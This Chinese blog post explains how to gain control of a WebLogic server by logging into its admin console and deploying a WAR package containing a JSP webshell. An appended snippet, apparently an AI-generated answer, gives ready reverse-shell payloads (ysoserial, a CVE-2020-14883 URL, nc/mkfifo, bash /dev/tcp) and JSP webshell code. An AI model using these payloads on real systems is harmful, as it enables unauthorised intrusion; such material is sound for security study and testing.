weblogic系列漏洞整理 ———— 3. weblogic 后台提权

最新推荐文章于 2025-04-17 09:11:19 发布
原创 最新推荐文章于 2025-04-17 09:11:19 发布 · 2.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了通过WebLogic中间件进行提权的操作流程。从获取后台密码开始,演示了如何上传包含恶意代码的WAR包,最终实现服务器权限提升。文章涵盖了WAR包的制作与上传步骤,以及验证提权成功的具体方法。

提权思路

weblogic是一个基于JavaEE的中间件,它可以解析jsp代码,当我们知道后台密码之后,即可登陆weblogic后台,上传恶意war包,从而进行提权操作。

漏洞利用过程

登陆weblogic后台 http://192.168.11.178:7001/console,进取之后点击左侧的部署,在弹出来的右侧页面点击“安装”

在安装页面选择“上载文件”:

在 “将部署上载到管理服务器” 区域选择"浏览",然后按照提示(其实就是一直下一步就行,最后点保存),将打包好的包含大马的war包上传至服务器。

WAR包的准备:

包含大马的war包制作方法:

jar -cvf test.war ./test/*

将test目录打包为test.war

上传:

上传成功后即可访问该jsp马查看效果

登录之后可以进行各项操作,下面简单的执行一个命令吧!

下面回到原来的系统中进行验证

至此完成!

Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现
渗透之路,攻防之间皆学问
03-03 7954
目录 一. 漏洞描述 二. 影响版本 三. 测试环境搭建 四. 漏洞复现 1. 远程命令执行 2. 反弹shell 五. 漏洞修复 六. 漏洞检测POC 一. 漏洞描述 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应.
weblogic漏洞检测集合工具
11-17
weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞
Weblogic常见漏洞详解
m0_64481831的博客
03-01 5282
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
Weblogic中间件漏洞合集
2301_77315080的博客
10-19 276
1、反序列化2、任意文件上传3后台部署war包。
Weblogic 常见漏洞汇总
热门推荐
box
04-20 1万+
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic XMLDecoder反序列化漏洞(CVE-2017-3506) 0x00 漏洞描述 网上爆出weblogic的WLS组件存在xmldecoder
weblogic漏洞系列
二月三十的博客
05-17 823
漏洞验证 POC下载:https://github.com/TopScrew/CVE-2019-2725 路径kali:/POCandEXP 进入脚本目录:cd /POCandEXP/weblogic/POC 命令:python3 WeblogicScan.py 1.1.1.14 7001 CVE-2019-2725 EXP下载:https://github.com/TopScrew/CVE-2019-2725 安装所需环境:sudo pip3 install logzero 命令回显 命令:pytho
WebLogic系列漏洞
A2893992091的博客
09-22 565
Weblogic的WLS Security组件对外供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的 XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏。通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell。2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传。访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在。2.在当前⻚⾯抓包之后,添加下⾯请求包,反弹shell。1.登录后台后,点击部署,点击安装,点击上传⽂件。
中间件漏洞测试——weblogic
qq_43592364的博客
08-13 1221
注意:下列漏洞复现是使用Ubuntu+docker实现的环境完成的,其中到的IP通过Ubuntu虚拟机中的ifconfig命令查看,端口不变,需要环境的可通过docker相关环境下载 一、XML反序列化漏洞 1、漏洞简述&影响版本 Weblogic的WLS Security组件对外供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令、getshell等危害。 影响版本:Webl...
weblogic漏洞复现
cgygsw的博客
03-31 173
save。
weblogic漏洞复现(一)
m0_67170526的博客
04-17 918
weblogic是是Oracle 公司开发的企业级 Java EE(现 Jakarta EE)应用服务器,主要用于部署和管理分布式、高可用的企业级应用。(个人感觉和tomcat差不多)
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
Weblogic GetShll&CMD;漏洞检测利用工具.rar
08-20
渗透测试中使用,可以用于检测weblogic漏洞并执行CMD命令,获取服务器限,本程序仅供检测和学习用途,请勿用于其他任何非法用途!
weblogic反序列化漏洞验证脚本(python版)对4.18最新漏洞检测
05-11
weblogic最新漏洞的检测,自己已经测试,可以使用,在使用之前系统要安装python和修改py文件中的ip和weblogic端口
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 1万+
一直没有系统的总结过 weblogic漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
weblogic漏洞汇总-XMLDecoder
黑白的博客
06-25 5360
受影响的版本vulhub上面只有CVE-2017-10271,我们就起CVE-2017-10271的镜像吧,因为CVE-2017-3506和CVE-2017-10271调用链都一样先有的CVE-2017-3506,不对用户输入的SOAP (XML) 数据进行验证,在其中使用object标签就可以进行远程命令执行。
【Web渗透】Weblogic漏洞总结
xnxqwzy的博客
03-08 1339
Weblogic的WLS Security组件对外供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞
常见中间件漏洞(二、WebLogin合集)
2301_76631050的博客
08-06 2215
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogic 系列漏洞
SHELLCODE_8BIT的博客
11-15 801
在 RMI 中可以通过调用远程服务器上的方法,对客户端传入的数据进行反序列化,当 T3 协议中的数据被替换成恶意类的序列化数据,则将导致服务器反序列化和实例化一个恶意的类,调用恶意方法,造成 RCE。在官方的补丁修复中,将 CVE-2020-2555 漏洞利用链中的 com.tangosol.util.filter.LimitFilter.toString() 给移除了,使得后面依靠 ChainedExtractor.extract()完成的攻击无法进行。此漏洞为CVE-2017-3248漏洞补丁的绕过。
weblogic系列漏洞整理 -- 3. weblogic 后台
weixin_30590285的博客
04-23 295
目录 三、 weblogic 后台 0. 思路分析 1. 利用过程 2. 示和技巧 一、weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.html 二、weblogic弱口令 ht...
weblogic中间件漏洞有哪些,可以怎样获取限?shell是什么
最新发布
09-30
<think>嗯,用户这次聚焦在Weblogic中间件的三个具体问题上:漏洞类型、限获取方法和shell概念。从ta引用的大量漏洞资料看,用户可能正在研究中间件安全,或是渗透测试学习者。 注意到用户特别强调“不是真正的需求”,说明ta更希望我炼核心知识点而非罗列引用内容。之前的引用中其实已经覆盖了关键漏洞(反序列化、未授访问、弱口令),但需要重新组织成体系化的分类。 关于“获取限的方法”,用户引用的四个资料恰好对应三种典型路径: 1. 利用反序列化漏洞直接执行代码(引用2和4) 2. 通过后台弱口令部署恶意war包(引用33. 组合利用未授漏洞加载恶意XML(引用4) ——这些应该作为方法论重点展开。 用户询问“shell的含义”这点很有意思。在漏洞文献中突然插入基础概念查询,推测可能是刚接触网络安全的新手。需要区别于普通命令行解释器,突出其在渗透测试中作为“控制通道”的特殊价值,最好用反向shell的例子说明攻击者如何维持访问。 突然想到补充XMLDecoder反序列化漏洞是必要的,因为用户供的引用4中到XML利用却没解释原理。另外T3协议漏洞虽然引用2过,但需要关联到更常见的CVE编号如CVE-2015-4852方便用户后续搜索。 防御措施部分用户没明确要求,但基于漏洞方法论的完整性应该简要及。特别是生产模式关闭测试页这点,用户在引用1里特别标注过“有一定限制”,说明ta注意到环境差异的影响。 最后shell的比喻可能需要更贴切,“系统的后门钥匙”这个说法是否准确?或许用“远程遥控器”更形象——毕竟攻击者是通过它发送指令的。 </think>以下是关于WebLogic中间件漏洞限获取方法及Shell含义的详细说明: --- ### **一、WebLogic中间件常见漏洞** #### 1. **反序列化漏洞** - **原理**:攻击者通过T3/IIOP协议发送恶意序列化数据,触发Java反序列化漏洞执行任意代码[^2]。 - **影响版本**: - CVE-2018-2628:影响10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3等 - CVE-2020-2551:影响10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4 - **风险**:远程获取服务器控制。 #### 2. **未授漏洞组合(CVE-2020-14882/14883)** - **原理**: - CVE-2020-14882:绕过控制台身份验证。 - CVE-2020-14883:通过构造恶意URL执行命令(如`.../console.portal?handle=com.tangosol.coherence.mvel2.sh.ShellSession("命令")`)[^4]。 - **风险**:未授执行系统命令,直接获取Shell。 #### 3. **任意文件上传漏洞** - **触发条件**:需开启Web Service Test Page(生产模式默认关闭)[^1]。 - **利用方式**:上传恶意文件(如JSP木马)到服务器。 #### 4. **后台弱口令漏洞** - **风险**:通过默认账户(如`weblogic/Oracle@123`)登录管理控制台,直接部署恶意WAR包获取限[^3]。 #### 5. **XMLDecoder反序列化漏洞** - **案例**:CVE-2017-10271,通过构造恶意XML数据执行系统命令。 --- ### **二、获取WebLogic限的常用方法** #### 1. **利用反序列化漏洞** - **步骤**: 1. 构造恶意序列化Payload(如Ysoserial工具生成)。 2. 通过T3协议发送至WebLogic服务端口(默认7001)。 3. 执行反弹Shell命令连接攻击机。 - **关键命令**: ```bash java -jar ysoserial.jar CommonsCollections1 &#39;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}&#39; > payload.bin ``` (Payload编码后执行`bash -i >& /dev/tcp/192.168.1.2/8888 0>&1`) #### 2. **组合未授漏洞利用** - **步骤**: 1. 利用CVE-2020-14882绕过登录验证。 2. 通过CVE-2020-14883执行命令加载恶意XML或直接执行系统命令[^4]: ``` http://target:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_handle=com.tangosol.coherence.mvel2.sh.ShellSession("rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.10+4444>/tmp/f") ``` #### 3. **弱口令+后台部署WAR木马** - **步骤**: 1. 爆破或使用默认口令登录`http://target:7001/console`。 2. 部署包含JSP Webshell的WAR包。 3. 访问Webshell路径执行命令。 #### 4. **文件上传漏洞利用** - **条件**:Web Service Test Page开启(`/ws_utc/begin.do`)。 - **方法**:上传JSP脚本获取Webshell。 --- ### **三、Shell的含义与作用** #### 1. **Shell的定义** - **本质**:命令行解释器,是用户与操作系统内核交互的接口(如Linux的Bash、Windows的CMD)。 - **在渗透中的作用**: - **Webshell**:通过Web服务器(如JSP/ASP/PHP脚本)执行系统命令的恶意脚本。 ```jsp <%@ page import="java.util.*,java.io.*"%> <% String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); // ...(输出执行结果) %> ``` - **反弹Shell(Reverse Shell)**: 目标主机主动连接攻击机,供命令行控制(绕过防火墙限制)。 **典型命令**:`bash -i >& /dev/tcp/攻击IP/端口 0>&1` #### 2. **Shell的限级别** | 类型 | 限说明 | 获取方式 | |---------------|-----------------------------------|------------------------------| | **Webshell** | Web服务器进程限(如`tomcat`用户) | 文件上传/代码注入 | | **系统Shell** | 高限账户(如`root`) | 漏洞(如脏牛、SUID滥用) | --- ### **四、防御建议** 1. **及时更新补丁**:关注Oracle官方安全公告,修复高危漏洞。 2. **关闭非必要服务**:生产环境禁用Web Service Test Page和T3协议外网访问。 3. **强化口令策略**:避免使用默认密码,启用多因素认证。 4. **最小限原则**:WebLogic服务账户降,限制文件系统写入限。 > **注**:本文所述漏洞利用方法仅限于安全研究,未经授测试属违法行为。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值